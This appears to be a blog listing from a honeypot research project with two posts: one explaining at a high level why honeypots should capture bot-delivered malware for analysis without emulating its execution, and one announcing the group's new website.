No more emulation!

27 Aug 2008 Tillmann Werner

Emulation is an important technology in honeypots and honeynets. It’s not always what we want, though, and here’s why. As you might know, most bots perform attacks in multiple stages, i.e., they

  • send some exploit code to the victim that opens a shell,
  • connect to that shell or let the shell connect back,
  • invoke commands to download the actual malware binary,
  • execute the malware.

Catching the exploit and providing a fake shell isn’t too hard, as shown in this post. But we certainly don’t want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.

Our New Website

12 Aug 2008 Lance Spitzner

Greetings! First I want to start off by thanking Steve Mumford, Christine Kilger, Jamie Riden, David Watson and Markus Koetter, they are the people that made our new website possible. Second, I wanted to share with you how excited I am about this. One of the challenges we have had for years is coordinating all the different research projects are members are doing. This site will allow each person to share as much as they want, however they want. Expect things like individual blogs, special interest groups and other research areas. Finally I hoping you the community find this website useful as it makes it easier for you to access the information and tools you need. As always, if you have questions or suggestions we would love to hear from you at [email protected].